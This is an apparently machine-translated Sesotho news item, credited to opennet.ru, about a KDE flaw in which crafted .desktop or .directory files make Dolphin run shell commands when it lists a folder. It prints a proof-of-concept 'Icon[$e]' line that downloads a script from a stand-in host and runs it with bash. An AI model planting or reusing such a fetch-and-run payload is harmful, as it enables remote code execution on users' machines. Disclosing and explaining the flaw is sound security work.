Ka KDE , e lumellang mohlaseli ho phethahatsa litaelo tse sa lebelloang ha mosebelisi a sheba buka kapa polokelo e nang le lifaele tsa ".desktop" le ".directory" tse etselitsoeng ka ho khetheha. Tlhaselo e hloka hore mosebelisi a shebe feela lethathamo la lifaele ho mookameli oa faele ea Dolphin, a khoasolle faele e mpe ea komporo, kapa a hule tsela e khuts'oane komporong kapa tokomaneng. Bothata bo iponahatsa tokollong ea hajoale ea lilaebrari le liphetolelo tsa khale, ho fihla ho KDE 4. Bofokoli bo ntse bo le teng (CVE ha e fuoe).
Bothata bo bakoa ke ts'ebetsong e fosahetseng ea sehlopha sa KDesktopFile, seo, ha se sebetsana le "Icon" e feto-fetohang, ntle le ho phonyoha ka nepo, e fetisang boleng ho KConfigPrivate::expandString() ts'ebetso, e etsang katoloso ea litlhaku tse khethehileng tsa khetla, ho kenyelletsa le ts'ebetso. likhoele “$(..)” joalo ka litaelo tse lokelang ho phethoa . Ho fapana le litlhoko tsa tlhaloso ea XDG, ts'ebetsong li-shell constructs li hlahisoa ntle le ho arola mofuta oa litlhophiso, i.e. eseng feela ha ho khethoa mohala oa taelo oa ts'ebeliso e tla hlahisoa, empa hape le ha o hlakisa litšoantšo tse bonts'itsoeng ka ho sa feleng.
Ka mohlala, ho hlasela romella mosebelisi polokelo ea zip e nang le bukana e nang le ".directory" ka tsela ena:
[Desktop Keno]
Mofuta=Directory
Letšoao[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)
Ha u leka ho sheba litaba tsa polokelo ea polokelo ho molaoli oa faele oa Dolphin, sengoloa sa https://example.com/FILENAME.sh se tla kopitsoa le ho etsoa.
Source: opennet.ru